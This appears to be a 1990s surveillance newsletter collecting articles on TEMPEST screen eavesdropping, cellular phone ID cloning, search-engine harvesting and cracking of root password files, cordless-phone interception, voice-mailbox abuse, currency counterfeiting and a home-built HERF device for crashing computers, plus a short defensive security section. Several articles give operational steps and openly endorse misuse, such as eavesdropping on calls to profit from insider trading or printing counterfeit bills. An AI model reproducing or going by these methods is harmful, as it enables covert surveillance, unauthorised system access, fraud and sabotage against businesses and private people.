reconstruct electromagnetic emissions from CRT's, CPU's and peripherals to
diagnose emission levels and give security personnel a hands-on tool with
which they can safeguard their computer data.  

In testing my countermeasures device I concentrated on interception and
reconstruction of the three types of emitted electromagnetic radiation
written about in  van Eck and Moller's work.

1. Electromagnetic radiation emitted from CRT's - similar to radio waves
2. Shell waves on the surface of connections and cables
3. Compromising radiation conducted through the power line

I found my greatest success (distance & quality) was in the collection of
emitted radiation from the CRT although we were equally successful in our
other experiments. In our opinion the greatest danger of TEMPEST monitoring
comes from off premises and we decided early on to concentrate in this area.
A workable countermeasures tool would give security personnel a handle on
distance from which compromising electromagnetic radiation could be
collected. Hopefully full countermeasures would then be implemented. 

This also is a double edged sword. The device I built albeit a
countermeasures tool...can be used as an offensive TEMPEST monitoring
device. My concerns however are that if such a device is not made available
to the private sector...then the private sector is at the mercy of the
information warrior using TEMPEST technology to gain an unfair advantage.

TEMPEST MONITORING...HOW IT WORKS

TEMPEST monitoring is passive. It cannot be detected. The computer emits
compromising radiation which can be reconstructed from a remote location.
There is no need to ever come near the target. No reason ever to go back to
change a faulty bug like the Watergate burglars...It can be performed from
an office or a vehicle with no chance of discovery. The premise is very simple.

All electronic devices emit some low level electromagnetic radiation.
Whenever an electric current changes in voltage level it generates
electromagnetic pulses that radiate invisible radio waves. Similar to the
ripples caused by dropping a small rock into a quite pool of water. These
electromagnetic radio waves can carry a great distance. 

Computer monitors like televisions contain an electron gun in the back of
the picture tube which transmits a beam of electrons (electric current).
When the electrons strike the screen they cause the pixels to fluoresce.
This beam scans across the screen from top to bottom very rapidly in a
repetitive manner, line by line, flashing on and off, making the screen
light and dark, creating the viewed image. These changes in the high voltage
system of the monitor, generate the incoherent signal that TEMPEST
monitoring equipment receive, reconstruct and view.  

We have found that most monitors emit signals in the 20 to 250 Mhz range
although harmonics are fairly strong and can be intercepted. Radiated
harmonics of the video signal bear a remarkable resemblance to broadcast TV
signals although various forms of sync must be restored.

Associated unshielded cabling can act as an antenna and increase
interception range. Emissions can be conducted down power cables and
supplies. Computers attached to unshielded telephone lines are easy prey as
the telephone line acts as an excellent antenna. Printers and their cables
are not immune either. The average computer setup in the home or office
could be compared to a base station transmitting it's signals all over the
neighborhood.

Put quite simply, it is easy for someone with basic electronics knowledge to
eavesdrop on you, while you are using a computer. They might not be able to
steal everything from the hard disk but they can view anything you do....see
anything you see...

HOW IT'S DONE...THE COMPONENTS

A good commercial wide band radio receiver preferably designed for
surveillance (requires a little modification) with spectrum display.
Sensitivity and selectivity are paramount. Not all receivers will do the job
adequately

Horizontal and vertical sync generator. Commercially available and will
require some modification.

Video Monitor with Shielded cables

Active Directional Antenna (phased antenna array) with shielded cables.
Think radio telescope.

Video tape recording equipment. For capture and later review.

WHAT WE WERE ABLE TO CAPTURE...

Bench testing of the unit was quite successful in and around the office.
Several computers were targeted and interception of the data was simple
after injecting and restoring vertical and horizontal sync. We had no
problem viewing computer screens on adjacent floors in the building (we were
sometimes hindered by noise) and were able to differentiate (to my surprise)
between different computers in a large office. We aimed our device out the
window across the street at an adjacent office building and were able to
view CRT screens without too much difficulty. 

I should mention here that during the field tests NO DATA WAS STORED FROM
TARGET COMPUTERS. We were not on an eavesdropping mission. We simply were
interested in testing OUR equipment not spying on others. 

Field testing of the unit was quite different and required continuing
manipulation of the equipment. From a vehicle in a suburban area we were
able to view active televisions inside homes ( the cable/pay-per-view people
could have a field day) and what programs residents were watching. When we
came across homes with active computers we were able to view CRTs. Average
range was approximately 300 yards.

We continued to test the device in a suburb of New York City with startling
results. We were able to view CRT screens at ATM machines, banks, the local
state lottery machine in a neighborhood candy store, a doctor's office, the
local high school, the fire department, the local police department doing a
DMV license plate check, a branch office of a securities trader making a
stock trade and the local gas station tallying up his days receipts. We
didn't expect that any of our "targets" would be TEMPEST certified and we
were correct.

BIGGER FISH IN A BIGGER POND

We took our DataScan device, as we named it, to New York City. The Big
Apple. We were interested in testing the integrity of various computer
facilities and also wanted to see how our device would operate in an urban
environment. 

Let me start off by saying New York is in a lot of trouble. We started at
Battery Park (the southern tip of Manhattan Island) and headed north to Wall
Street. The US Customs building leaks information as well as the Federal
Reserve. Wall Street itself was a wealth of information for anyone
interested. With hundreds of securities and brokerage companies located
within a few blocks of each other, all an information warrior need do is
rent an office with a view and aim his antenna. We were able to view CRT's
in MANY executive offices. 

The World Trade Center was fertile. It afforded open parking areas nearby
with millions of glass windows to snoop...we were most successful snooping
the lower floors from the street. We borrowed a friends office at mid-tower
in the south building and were able to view CRT's in the north building easily.

We headed east towards the New York Post newspaper offices and read the
latest news off their monitors (which was printed the next day). We headed
north towards City Hall and NYPD Police Headquarters. Guess what? They're
not TEMPEST certified either...Neither is the United Nations, any of the
midtown banks, Con Edison (the power company) on First Avenue, New York
Telephone on 42nd Street or Trump Tower! Citicorp's computer center in the
SkyRink building on West 33rd Street was a wealth of information also...

We found that with the proper frequency tuning, antenna manipulation,
reintroduction of sync and vehicle location , we could monitor just about
anyone, anywhere, anytime. There is no doubt in my mind that TEMPEST
eavesdropping is here to stay and something that must be dealt with by
computer and security professionals.

Passwords, files, proprietary data and records are all vulnerable to the
information warrior using TEMPEST monitoring equipment in a non TEMPEST
certified world. 

POTENTIAL USERS OF TEMPEST MONITORING

Big Brother:

Yes, that's right. He does bug businesses. Sometimes with a court order and
sometimes without one. It's unclear under present American law whether or
not a court order would to needed to collect TEMPEST information. You never
know when Big Brother's on a witchhunt. Maybe he suspects you of being a tax
cheat, of insider trading, leftist sympathies, etc.  Remember Watergate?
Now, the FBI wants to be able to tap EVERY telephone, fax and data line in
America at the turn of a switch and they want US to pay for it...Using
TEMPEST technology they need never enter or come near your home or business.

Foreign Intelligence Services:

In the last days of the Bush Administration, the mission of the CIA was
partially changed to spy on foreign businesses and steal trade secrets in
response to the every growing surveillance of American industry by foreign
competitors and foreign intelligence services. The Japanese are the worst.
Most of the Japanese students living and attending school the USA are
economic trade spies. The French intelligence service regularly bugged ALL
the first class seats on AIR FRANCE flights to eavesdrop on traveling
foreign businessmen. EVERY foreign service in the world is involved in
corporate espionage to gain an economic advantage for their own companies.
Do you have a foreign competitor? Then the chances are good that a foreign
intelligence agency will spy on you. TEMPEST technology is becoming the
medium of choice .

The Activist:

Dedicated, yet misguided activists may wish to further their own cause by
releasing your private disclosures to the media. Every company circulates
confidential memos that would be embarrassing if released to the public.
TEMPEST technology makes corporate snooping simple.

The Dissident:

Dissidents want to damage more than your company's reputation. They may use
TEMPEST technology as a means of compromising your internal security,
valuable products and equipment, and even executive travel plans in order to
commit crimes against your person, family or property!

Financial Operators

Unethical financiers can benefit greatly from prior knowledge of a company's
financial dealings. TEMPEST attacks can be mounted quickly and from a
distance with virtually no chance of discovery.

Competitors:

Competitors may seek to gain information on product development, marketing
strategies or critical vulnerabilities. Imagine the consequences of a
concerted TEMPEST attack on Wall Street. How much are you going to offer for
that stock next week? You need to buy how many shares for control?

Unions:

Unscrupulous union negotiators may use TEMPEST technology to gain knowledge
of a company's bargaining strategies and vulnerabilities. Is  your company
is having labor problems? Is your company is involved in any type of
litigation or lawsuit with a union? Does your company have layoffs pending? 

Employees:

One of your company's employees might use TEMPEST technology on another to
further his own career and to discredit his adversary. It would be a simple
matter for an adversary to plant a mole in your company who could position
TEMPEST monitoring equipment in the right direction even though they might
not be allowed to enter a specific restricted area...

The Information Warrior:

Brokers may profit from selling your company's secrets to the highest
bidder, or maybe even to anyone who wants to know! Does your company have
stock that is traded publicly? Or will be soon? With TEMPEST technology
there is nowhere to run...nowhere to hide...Keep in mind that anybody with
money, power, influence, or sensitive information is at serious risk.

FINDINGS AND RECOMMENDATIONS

Using simple off-the-shelf components with minor modifications we were able
to monitor computer CRTs "at-will" in suburban and urban environments. We
did not recreate the wheel. The TEMPEST monitoring premise is simple and
anyone with a basic knowledge of electronics could construct such a device
and use it with impunity. 

Our DataScan device differs from earlier models because of the unique signal
amplification and directional antenna array used which we believe enhances
the collection process greatly.

It appears from our research that most individuals and companies do not use
TEMPEST certified equipment and most have never even heard of TEMPEST.

I believe the media should be made aware of the problem in hope that
publicity about potential TEMPEST attacks will force the government to
release the information necessary to allow private citizens and industry the
means to properly secure their proprietary data.

****************************************************************************
*******
****************************************************************************
******

HACKING CELLULAR PHONES                                                         

It turns out that there are several Japanese handheld transceivers (HT's)
availible in the US for use by ham radio hobbyists that have hidden
features allowing them to operate in the 800MHz band used by cellular
telephones. 

Using an FSK decoder chip and a personal computer running an assembly
language program to record and decypher the ID beeps at the beginning of
cellular calls, a "phone book" of celular ID's can be compiled. A simple
FSK oscillator controlled by the PC can then be used to dial out using the
Handheld Transceiver and the captured ID codes.

A low tech analysis could be done by taping the beeps and playing them back
at slow speed into an oscilloscope. An edited tape may even be adequate for
retransmission; no decyphering required.

Several radio stores in New York sell the HT's and have given advice in the
past about how to access the hidden out-of-band tuning features in the ROMS
of the Japanese HT's. It's possible now to listen in to cellular phone
conversations without building any special hardware. In fact if you have a
good antenna, or live near a cellular repeater tower, you can pick up
celluar calls using a UHF TV with a sliding tuner by tuning in "channels"
between 72 and 83 on the UHF dial.

Beside the obvious benefits of unlimited, untraceable, national mobile voice
communication, there are other uses for cellular hacking. For instance: most
people using cellular phones are pretty upscale. It is possible to scan for
ID codes of the telephones of major corporations and their executives and
get insider stock trading information. Simply by logging the called and
calling parties you will be able to compile a database mapping out the
executive level command & communication structure. If this is linked to a
Vox operated tape deck you will know precisely what is going on and be able
to note any unusual activity, such as calls between the executives of
corporations that are in a takeover or leveraged buy out relationship. It is
even likely that you will occasionally intercept calls between investors and
their stock brokers, or calls discussing plans for new contracts.

This data is most safely used for insider trading of your own; there will be
no way that the Securities and Exchange Commission can establish a link
between you and the insiders. A more risky proposition would be to offer any
intelligence gathered to competitors for a price as industrial espionage.

Then there are the anarchy & disruption angles for cybernetic guerrilla
action at the corporate economic & financial level. Leaking info to the
press can kill a deal or move stock prices prematurely. Intelligence
gathered via cellular hacking can also be used to plan operations against
corporate mainframes by providing names and keywords, or indicating vital
information to be searched for. Listening to the phone calls of candidates
and their campaign staff is also a field rich in possibilities.  :)
+

****************************************************************************
*******
****************************************************************************
*******

WEB SITE HACKING

A friend of mine showed me a nasty little "trick" over the weekend. He went
to a Web Search server (http://www.altavista.digital.com/) and did a search
on the following keywords -
     
          root: 0:0 sync: bin: daemon:
     
You get the idea. He copied out several encrypted root passwords from
password files, launched CrackerJack and a 1/2 MB word file and had a root
password in under 30 minutes. All without accessing the site's server, just
the index on a web search server!
     
Well, the first thing I did was check my site and it's ok. The second thing
I did was check my ISP for my home account, and it's okay. But by trying
various combinations of common accounts on web searches, dozens of passwd
files were found.
     
It seems that a large number of locations who use httpd and ftpd on the same
server often copy the regular passwd file to ftp/etc or ftp-users/etc for
ftp user access. A few sites have left the root password in the file, and
many contain user accounts' passwords. The problems I see here are as follows:
     
1. You can get the passwd file in some cases by simply pointing your URL to
http://target.com/ftp/etc/passwd or http://target.com/ftp-users/etc/passwd.
Not good. Anon ftp can't get  it but a web browser can. Many passwd files
are shadowed but you can see some legit account names. Yes, I realize that
this may be a dummy file but hey, not always the case.

2. Some sites do not have the passwd file world readable, but the entire
passwd file stills exists indexed on the web search server. I don't know
about you, but I don't think I'd want my passwd file indexed and searchable
on a world accessible web server.   +

****************************************************************************
******
****************************************************************************
******
MONITORING 900Mhz SPREAD SPECTUM

Whats the current thinking on the security level of 900Mhz digital spread
sectrum cordless phones? Clearly it's not a basic scanner job but how much
more equipment is needed to monitor one ?

The easiest way to do this is to simply buy a similar phone which has all
the required signal processing hardware for that particular type of spread
spectrum and modify it to receive promiscuously and not transmit while doing so,

As far as I know, essentially no cordless phones use any kind of actual
secure encryption of the digital bit stream, so all you have to do is ensure
that your shadow 
phone is primed with the correct spreading sequence or hopping sequence and
is tuned to the right center frequency. Typically choices for these are very
limited (maybe 20 channels) and modifying the micro firmware in a phone or
base unit to search all possiblities is realistic, especially with the help
of an external PC as controller.

The digital 900 mhz phones all use different proprietary modulation schemes,
but many of them simply transmit a FSK or BPSK RF  carrier digitally
modulated by the output bitstream of a codec chip (CVSD or regular u-law
PCM) on one of several randomly selected channels,  perhaps slowly hopping
from channel to channel in a fixed sequence.  Even the phones that use
direct sequence spreading are effectively just transmitting a fast BPSK
signal modulated at the chip rate.   Receivers and signal processing boxes
capable of dealing with this kind of digital modulation are a standard
commodity item in the spook world (made by Condor Systems and Watkins
Johnson and the like) and even sometimes show up on the high tech surplus
market (and are collected by some of us who collect high tech spook hardware
as a hobby)
they are however very expensive compared with simply modifying a couple of
real phones to do the job.

The digital modulation and "spread spectrum" features of 900 mhz phones are
primarily intended to allow them to share the 902-928 mhz band with all the
other users (other phones, truck tracking systems short range wireless video
cameras and video distribution, various industrial users, wireless LANs of
several types, ham radio operators, and several other types of unlicensed
uncoordinated devices radiating up has plagued the older 46/49 mhz FM type.
The FCC in fact requiressome level of spectrum spreading for this purpose
but leaves the actual choice up to the  implementor rather than establishing
a standard method.    Obviously only a secure form of encryption with
randomly  chosen and wide enough keys would really make intercepting a
digital cordless phone difficult for someone determined to do so, especially
if they were targeting one particular phone.  I believe almost all of the
manufacturers have chickened out in the face of NSA and ITAR and not even
implemented toy encryption with random keys - they are simply assuming that
Joe Sixpack or his 14 year old son won't be able to pick them up  on a
commercially available scanner and that the federal law banning sale of
scanners capable of intercepting digital transmissions and converting them
to analog listenable audio will keep the scanner companies from marketing
such and keep customers from complaining about nosey neighbors listening to
their calls. But don't assume that if someone really has some serious
reason, you can be certain that expensive ($5-$20K) DSP based systems
capable of  intercepting several common types are already for sale to the
usual suspects. And finally one should not forget that unless one has an
ISDN line, intercepting calls on regular analog subscriber loops (normal
telephone lines) by virtually undetectable simple alligator clip class
wiretaps or bugs is something that any bright 12 year old can pull off (and
many do before they grow up) - so if you have something to hide you
shouldn't trust the phone at all.     +

****************************************************************************
********
****************************************************************************
********

COMPUTER SECURITY FOR PRIVATE PEOPLE

Why should you worry about security?  The answer lies in the fact that
information has become an extremely marketable commodity.This commodity can
be stolen from you without your knowledge, causing sometimes devastating
harm to your business and personal life.  Sensitive information needs guarding.

Implementing an computer security program first requires you to determine
what data is truly sensitive.  The rule of thumb should be that any data,
improperly released, that could cause a loss equivalent to ten percent of
your annual net profit or mental hardship should be classified as sensitive.

METHODS OF ATTACK

Computer-based systems include all machine-readable files and auxiliary
items such as magnetic backup tapes, floppy disks, printer paper carbons,
and printer ribbons.  Common methods of attack include unauthorized copying
of files, hacking (unauthorized access to your system), between-the-lines
entry (using a logged in terminal while the user is away), and hard disk
surveillance (using a utility program to search for sensitive files on your
Hard drive).  Wire taps or other methods used to intrude on your phone lines
or view your monitor.

Imagine that you are holding an unlabeled floppy disk in your hand.  Can you
tell by eye what the disk contains?  No, you need a computer to do that.
How much information can a 720K disk hold?  Even a disk of that small
capacity holds more data than a regular size novel.  High density disks (1.2
MB) hold almost twice that amount.  When you give the DOS "Del a: *.*"
command for this disk, all of the files are completely erased from the disk
right?  Wrong! Any good utility program such as the Norton Utilities or
Lotus' Magellan can find those files and undelete them. 

s copying files from a hard disk to a floppy a time consuming and complex
process?  No, even with relatively large files, it is a fairly simple and
quick procedure.  Using a program like Magellan, one would be able to pick,
choose, and sort files to copy very easily.

>From the preceeding questions, the following about floppy disks is evident:

1. Unless they are scanned by a computer, you cannot tell what files are on
them.  External labels may be incorrect or misleading.  Classification
labels can be removed.

2. Their data storage density is such that hundreds of sensitive files could
be walking out your door on a few microfloppies in someone's shirt pocket.

3. Floppies can retain sensitive files even when they look erased.

4. Floppies are easy to copy.  It is easy to copy files from hard disks to
floppies.  None of this requires any extensive computer knowledge.

Since floppy disks and the new 8mm magnetic tape backups for PC's have
extreme portability, rigid measures have to be taken to protect them and to
prevent unauthorized copying of your hard drive onto these media.The
following would help:

a. While it is fine to keep your programs on hard disk, the sensitive data
files that they generate would be written to floppy disks.  These disks
could be backed up with another disk.  The originals should be locked up
onsite.  The backups should be securely stored offsite.

b. Make sure sensitive magnetic media have both an external label and an
internal electronic label designating their classification (the DOS LABEL
command can do this).

c. Use the DOS ATTRIBUTE command on sensitive files to set an electronic
switch so that the files cannot be accidentally erase.  Attributing sensitive
files on a disk also acts as a deterrent to someone grabbing a classified
disk, changing the external label, then doing a global DELETE on the disk so
they can remove it from the site under the guise of it being empty.  Later
they would UNDELETE the files using a file utility.

d. Employ password security on sensitive files.  Wordperfect 5.1 (and
higher) has the ability to place minimal password protection on files.
While the password (lockword) protection for Wordperfect is far from
foolproof, it, combined with the other security measures suggested, provides
a fairly decent perimeter of security.  There are software packages
available for PC's that can encrypt entire files.

e. Have a consistent backup procedure for all of your files.  Backup
sensitive files onto disks designated and labled for that purpose.

f. Do not leave disks with sensitive files on them unattended or unsecured.
In large offices, require that authorized users of classified disks sign the
media in and out through a designated librarian.

g. Before sending a magnetic disk to someone, scan it with a file utility
program to ensure it has no deleted, but recoverable, sensitive files.  If
it does, reformat the disk, and then write the non-sensitive files to the disk.

h. Before trashing magnetic media, cut them up into little pieces.  For
damaged disks containing highly sensitive files, you may wish to use a
degausser on the disk first.

By not keeping sensitive files on your hard disk, you go a long way toward
computer security.  However, you should also consider the importance of not
leaving 

a secure place (such as a locked drawer in their desk).  At the end of the
day, all classified media must be returned to the central library to be
locked up.  Also, auxiliary items such as spent carbons, printer ribbons,
printouts, and damaged magnetic media should be securely stored until
disposed of.  Sensitive computer printouts should be shredded and intermixed
with non-sensitive shredded documents prior to disposal.

OTHER COMPUTER DEFENSES

You may decide to use integrated software security packages such as Norton
Disklock.  These among other packages, offer hard disk lockdown, file
lockword protection, temporary keyboard lockdown, and some security audit
trails.  The best defense though is not to put all your eggs in one basket.
One can install security software on their computer and still keep sensitive
files on securely locked away floppies.  In fact, it might behoove you to
place "decoy" sensitive files behind your security software defense.  Decoy
files look like they contain valuable, sensitive information, but in
reality, behind their technical appearance, they have no useful secrets.
These types of files can be "trapped" with information which, if it becomes
public, would be harmless, but would tell you of a penetration or
compromise.  This method can be called the "False Fortress" defense.  A TSCM
(or Technical Surveillance Countermeasures) expert should be consulted if
there is a possibility of some wanting your data so badly that they would
resort to illegal taping or otherwise tampering with your phone lines or
remotely viewing your monitor (yes it can be done).

POINTS TO REMEMBER

1. When the terms "lock" or "locked up" are used for storage areas, we mean
locks or safes that can withstand a physical attack of at least one to two
hours of duration.

2. Do not make it easy for an information thief by placing signs in your
office on where sensitive materials are stored.

3. Keep access to sensitive information by your coworkers and associates on
a need-to-know basis.

SUMMARY

Your computer security will be good only if you use a comprehensive plan.
Each defense must be adequate.  It does little good if the password to a
sensitive file is your first name.  Learn to think like an information
thief, and you will have less chance of being victimized by one.

If you think that there is no possibility of anyone attempting to use covert
methods to steal information from you...think again! In today's high-tech
world, secrets are increasingly at a premium.         +

****************************************************************************
*********
****************************************************************************
*********

THE USE OF VOICE MAILBOXES BY TELEPHONE PHREAKERS

For the past few years the use of voice mailbox systems in the USA has been
increasing. Voice mailbox systems must be divided into two different types:
Toll-free voice mailbox systems used by many types of companies, and voice
mailbox systems from companies providing party lines, dating lines and
other, mostly expensive, services.  Normally a  phreaker will primarily
select the toll-free voice mailbox system.  If no toll-free voice mailbox is
available he probably has the knowledge and the technical capability to call
a voice mailbox of a service provider in an illegal toll-free way. The
problem, however, is not which voice mailbox system he will call, but how he
will use it.

 To understand how to misuse a voice mailbox system, the basic system use
must be understood. A voice mailbox is like a house. When you enter the
house your host welcomes you. The host in this case is a voice menu
explaining all the functions of the system. To choose one of these functions
you just have to press the corresponding button of the key-pad. Having made
a selection you will leave the entrance and enter a "room". Each room is
dedicated to a special topic. Topics can be live discussions with as many
people as are in the room, public message areas, private message areas,
playing a game, etc. A large voice mailbox system can have more than 100
different "rooms".  If the number is not toll free, the phreaker uses
techniques to call the voice mailbox system free of charge anyway. If the
voice mailbox is interesting, easy to hack and fits his needs, the phreaker
has a lot of  uses for such a system. It has been evidenced by court trials
that phreakers use voice mailbox systems as their "headquarters", to meet,
to discuss, to have conferences with up to 20 persons participating at the
same time, to leave messages to other phreakers or to deposit and share
knowledge.  They waste system resources without paying for it. It is also
interesting to see how the phreakers used system resources.  

As mentioned above, a voice mailbox is  like a house, a house with
easy-to-pick or no locks in the doors. The business of the service provider
requires the voice mailbox to be easy to use without big security
installations. The voice mailbox must be an open house for everybody, and
that makes it easy for the phreaker. First a phreaker will look for hidden
functions in the voice mailbox. Hidden functions are normally used to
reprogram the voice mailbox from a remote location. Commonly, hidden
functions are available to increase the security level of certain rooms and
for creating new rooms with new possibilities and features. With knowledge
of the hidden functions of a system, the phreaker can create new rooms for
meetings with other phreakers, and he is able to raise the security level of
such rooms so that only insiders can gain access. Increasing the security
level means assigning an access code to a room.  

Without knowledge of the access code the room cannot be entered. Thus, he is
able to create a voice mailbox inside  the voice mailbox for a closed user
group, "Entrance for phreakers only". This voice mailbox for phreakers can
be used to post calling card numbers, private messages for other phreakers,
the newest access codes for other voice mailbox systems, the newest tricks
on how to cheat the telephone system, etc. All owners of voice mailbox
systems can do is to watch the traffic inside his system and look for
changes such new rooms suddenly appearing. From a pratical point of view it
is very difficult to increase the security of a voice mailbox without
causing problems for paying users. In case of misuse it is necessary to
co-operate with.  a security expert and the local authorities to limit
financial losses.                    +

****************************************************************************
********
****************************************************************************
********
COUNTERFEITING MONEY

This information is provided for informational purposes only to familiarize
security and law enforcement personnel with one method of counterfeiting
money.  Before reading this article, it would be a very good idea to get a
book on photo offset printing, for this is the method used in counterfeiting
US currency. If you are familiar with this method of printing,
counterfeiting should be a simple task. Genuine currency is made by a
process called "gravure", which involves etching a metal block. Since
etching a metal block is impossible to do by hand, photo offset printing
comes into the process. 

Photo offset printing starts by making negatives of the currency with a
camera, and putting the negatives on a piece of masking material (usually
orange in color). The stripped negatives, commonly called "flats", are then
exposed to a lithographic plate with an arc light plate maker. The burned
plates are then developed with the proper developing chemical. One at a
time, these plates are wrapped around the plate cylinder of the press. The
press to use should be an 11 by 14 offset, such as the AB Dick 360. Make 2
negatives of the portrait side of the bill, and 1 of the back side. 

After developing them and letting them dry, take them to a light table.
Using opaque on one of the portrait sides, touch out all the green, which is
the seal and the serial numbers. The back side does not require any
retouching, because it is all one color. Now, make sure all of the negatives
are registered (lined up correctly) on the flats. By the way, every time you
need another serial number, shoot 1 negative of the portrait side, cut out
the serial number, and remove the old serial number from the flat replacing
it with the new one. Now you have all 3 flats, and each represents a
different color: black, and 2 shades of green (the two shades of green are
created by mixing inks). Now you are ready to burn the plates. Take a
lithographic plate and etch three marks on it. 

These marks must be 2 and 9/16 inches apart, starting on one of the short
edges. Do the same thing to 2 more plates. Then, take 1 of the flats and
place it on the plate, exactly lining the short edge up with the edge of the
plate. Burn it, move it up to the next mark, and cover up the exposed area
you have already burned. Burn that, and do the same thing 2 more times,
moving the flat up one more mark. Do the same process with the other 2 flats
(each on a separate plate). Develop all three plates. You should now have 4
images on each plate with an equal space between each bill.

The paper you will need will not match exactly, but it will do for most
situations. The paper to use should have a 25% rag content. By the way,
Disaperf computer paper (invisible perforation) does the job well. Take the
paper and load it into the press. Be sure to set the air, buckle, and paper
thickness right. Start with the black plate (the plate without the serial
numbers). Wrap it around the cylinder and load black ink in. Make sure you
run more than you need because there will be a lot of rejects. Then, while
that is printing, mix the inks for the serial numbers and the back side. You
will need to add some white and maybe yellow to the serial number ink. You
also need to add black to the back side. 

Experiment until you get it right. Now, clean the press and print the other
side. You will now have a bill with no green seal or serial numbers. Print a
few with one serial number, make another and repeat. Keep doing this until
you have as many different numbers as you want. Then cut the bills to the
exact size with a paper cutter. You should have printed a large amount of
money by now, but there is still one problem; the paper is pure white. To
dye it, mix the following in a pan:  cups of hot water, 4 tea bags, and
about 16 to 20 drops of green food coloring (experiment with this). Dip one
of the bills in and compare it to a genuine US bill. Make the necessary
adjustments, and dye all the bills. Also, it is a good idea to make them
look used. For example, wrinkle them, rub coffee grinds on them, etc.

As before mentioned, unless you are familiar with photo offset printing,
most of the information in this article will be fairly hard to understand.
Along with getting a book on photo offset printing, try to see the movie "To
Live and Die in LA". It is about a counterfeiter, and the producer does a
pretty good job of showing how to counterfeit. A goodbook on the subject is
"The Poor Man's James Bond".

If all of this seems too complicated to you, there is one other method
available for counterfeiting: The Canon color laser copier. The Canon can
replicate ANYTHING in vibrant color, including US currency. But, once again,
the main problem in counterfeiting is the paper used. 

This data is provided for informational purposes only.  Counterfieting is
illegal and you will be arrested if caught. +

****************************************************************************
********
****************************************************************************
********

HOME BREW HERF DEVICE

We coined HERF (High Energy Radio Frequency) as a generic term to  mean  a
device that can interfere with a computer  or  communication's system
operation. Simply,  since a computer is electronic in nature, it both  emits
low level radiation and is susceptible to external  interference.   For
example, when your cell phone goes haywire on a bridge or  in  a tunnel, it
is caused by interference.  In this case the  interference  in passive.  The
metallic structures 'suck-up' and  disperse the transmissions and you get nada.

Or, in the days of roof antennas, a pigeon would cause TV  reception  to
falter just as a lightening storm could make the  screen go blank for a few
seconds. (With cable it's a few hours.)

A  computer is just as susceptible to interference,  except  that  more
power is required to cause a system failure or 'crash'.   It  is  no
surprise that surge protectors are designed to keep  power linespikes from
affecting a computer . . . a so called  natural phenomenon.  Not man made .
. . just part of the power grid.   We have  all  learned  that certain
integrated  circuits,  (IC's  or chips)  will  self-destruct if we touch
them after walking  on  a carpet  on  a dry day.  The discharge of  static
electricity  is large  enough to break down the silicon barrier on the chips
and Voila! No more chip  . . . no more working computer. It  should  be no
surprise then that a non-natural, or man made electrical discharge would
have similar results. And they do. The  object, on the part of certain in
the military, is to create an arsenal of non-lethal weaponry.  And they are
doing it.

The  concept of particle beam weapons as part of Star Wars  (SDI)  relied
upon focussed high energy beams that would destroy  their  electronic
targets.  Ground based systems have been tested at the  regular weapons
places like Los Alamos et al with varying degrees  of success. Remember, the
military requirements are generally  an  order  of  magnitude more rigid, so
from  their  standpoint,  the  technology isn't there yet. For example, one
mission goal would be: create a system that  can  force  an cooperative
pilot to make landing.  Drug running  is  a  good  example.  By targeting
the avionics and  communications  of  the  target  aircraft, the policing
airplane  would  successively  disable  systems until the plane either
landed or  . . . well  it  is a big ocean.  But conventional explosives
would be unnecessary  and  the pilot would have been an unfortunate victim
of a  'plane  that ran out of gas.'

HERF weapons can be operated over a wide range of frequency  with  a
corresponding  set  of pros, cons  and  functional  tradeoffs: distance,
dispersion, penetration, reflection . . .  all  pretty  basic stuff for a
first year engineering student.  

Some businesses located on sightlines near airports have experienced
periodic computer malfunction . . . with no apparent source  or  readily
observable villain.  But, it turns out that the  high  power  radar  systems
have been responsible in many  cases.   The  high  frequency (above 1GHz)
radar signals penetrate most  structures,  are focussed and can crash a
computer network in a  split second.   Having  unexplained system crashes?
Look  for  outside influence. There are ways to identify certain power
sources. Until  recently  I thought that HERF guns or their brethren  HPM
(High  Power  Microwave) devices were a military  and  laboratory reality,
and in the future they would migrate into the hands of the 'bad guys'.  I
was wrong.

It's  pretty  obvious that the hobbyist with a  few  dollars  can purchase
a  surplus radar system from the  U.S.  Government  for pennies  on the
dollar.  Make a few modifications and BINGO,  you got yourself a pretty
potent electronic weapon. But  it was not so obvious that HERF guns had
already evolved  to street  technology  - where the home brew hobbyist  can
put  one together from spare parts. We made one.  

The  device  was ostensibly built as an electronics  project  for giggles.
If you build up a large electric high  voltage  field, the  air around the
point of electrical build up can  ionize  and actually glow. The familiar
experiments with Van De Graaf generators  and  Tesla coils create long spiky
lightening-bolt  shaped electrical  discharges  that are most  impressive.
But  another phenomenon  of  sustained  high voltage fields is  known  as
St. Elmo's Fire which World War II fighter pilots and North Atlantic seamen
report as balls of lightening that can dance or follow  a plane or a ship.
Last year, some friends and I were  trying to come up with a unique window
decoration  for  Christmas. We put nails around  the  window  frame,
attached the right wires,added a few more gizmos and waited for St. Elmo's
Fire to provide  a ghostly glow in the darkness. 

But, in our experimentation with the device, we found that if we discharged
the voltage field in a short We also found that the discharges could cause
computers  up to  a  couple of hundred yards away to also feel the  effects
of my St. Elmo's toy.  Admittedly curious, we played with  the circuits and
wanted to see just how much of an effect my home-brew efforts could have.
We contacted friends in Australia and asked to listen to certain frequencies
on their short wave radio.  It turned out that every time the device was
quickly discharged, sufficient  energy was released in a short period of
time to be 'heard' 14,000 miles away.

Our HERF gun is astonishingly simple.  Mounted on a  piece  of wood  about
12" square sits the power transformer, rectifier  and storage capacitors.
(This is also known as a power supply.)

A  heavy gauge (4 or 6) wire runs from the plywood circuits to  a long  tube
with a 1/2" thick metal bar on the end.   Inside  the tube  is  another
circuit, this one purloined  from  a confidential source. This circuit is
generically known as  Jacob's Ladder or a high voltage multiplier. It takes
the input voltage from the power supply (of a couple thousand volts for
example) and  brings it to perhaps millions of volts.  Or,  lower  voltage
and higher current.  Ohm's law applies.

A one microsecond pulse of 2.5 Megawatts is emitted every time it is fully
charged. That's the equivalent of 100 amps at 25,000 volts, or 10 amps  at
250,000  volts.  The  circuit performance can  be  enhanced  very easily I
believe. Just put a tuned coil as the output load and a resonance  will
increase the power in a focussed  range  by  a factor of 10. Twenty five
Megawatt pulses are trivial.

The dispersion pattern is uncontrolled to say the least. Omnidirectional is
an understatement. When we designed it we were not interested  in  focussed
damage . . . but the  resultant  local  computer outages were a source of
entertainment. For us. Frequency and directionality are inversely
proportional and  with  a  little engineering, a more usable system is on
the horizon. All  for the price of a few parts from Radio Shack and Ed's
Electrical Junk Store. The principle behind HERF guns is simplicity itself
and they have arrived  a lot sooner than any of us.       +

There's a LOT MORE in every issue of the Codex. Subscribe today. Don't miss
an issue...







 









    


                                            




     







Check out our WEB SITE - The Codex Privacy Page
URL: http://www.thecodex.com

The Codex Surveillance & Privacy Newsletter
DataScan - Diagnostic TEMPEST Evaluation System
Design and Fabrication of Specialized Systems
